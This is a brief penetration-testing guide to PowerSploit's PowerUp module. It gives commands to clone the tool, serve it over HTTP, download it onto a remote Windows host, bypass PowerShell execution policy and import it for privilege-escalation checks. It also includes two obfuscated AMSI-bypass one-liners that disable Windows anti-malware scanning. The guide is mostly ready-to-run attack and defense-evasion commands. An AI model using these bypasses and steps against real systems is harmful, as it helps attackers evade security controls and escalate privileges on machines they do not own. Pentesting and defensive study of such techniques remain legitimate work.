PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment.

PowerUp

  • Clearing house of common privilege escalation checks, along with some weaponization vectors.

How to

1. Download the Tool

  • git clone https://github.com/PowerShellMafia/PowerSploit.git
  • cd PowerSploit/Privesc
  • ls

2. Transfer the tool to the remote machine, first set a web server in the local machine

  • python3 -m http.server 9999

3. In the remote server using powershell run the following

  • IWR http://192.168.0.12:9999/PowerUp.ps1 -OutFile PowerUp.ps1
  • dir

4. Bypass the execution policy

  • powershell -ep bypass

5. Bypass AMSI protection (anti-malware)

  • sET-ItEM ( ‘V’+’aR’ + ‘IA’ + ‘blE:1q2’ + ‘uZx’ ) ( [TYpE]( “{1}{0}”-F’F’,’rE’ ) ) ; ( GeT-VariaBle ( “1Q2U” +”zX” ) -VaL ).”A`ss`Embly”.”GET`TY`Pe”(( “{6}{3}{1}{4}{2}{0}{5}” -f’Util’,’A’,’Amsi’,’.Management.’,’utomation.’,’s’,’System’ ) ).”g`etf`iElD”( ( “{0}{2}{1}” -f’amsi’,’d’,’InitFaile’ ),( “{2}{4}{0}{1}{3}” -f ‘Stat’,’i’,’NonPubli’,’c’,’c,’ )).”sE`T`VaLUE”( ${n`ULl},${t`RuE} )

# New AMSI bypass obfuscation:

  • [ReF].”`A$(echo sse)`mB$(echo L)`Y”.”g`E$(echo tty)p`E”(( “Sy{3}ana{1}ut{4}ti{2}{0}ils” -f’iUt’,’gement.A’,”on.Am`s”,’stem.M’,’oma’) ).”$(echo ge)`Tf`i$(echo El)D”((“{0}{2}ni{1}iled” -f’am’,’tFa’,”`siI”),(“{2}ubl{0}`,{1}{0}” -f ‘ic’,’Stat’,’NonP’)).”$(echo Se)t`Va$(echo LUE)”($(),$(1 -eq 1))

Note. AntiVirus could block this from running.

6. Proceed to import PowerUp and run it

  • Import-Module .\PowerUp.ps1
  • Invoke-AllChecks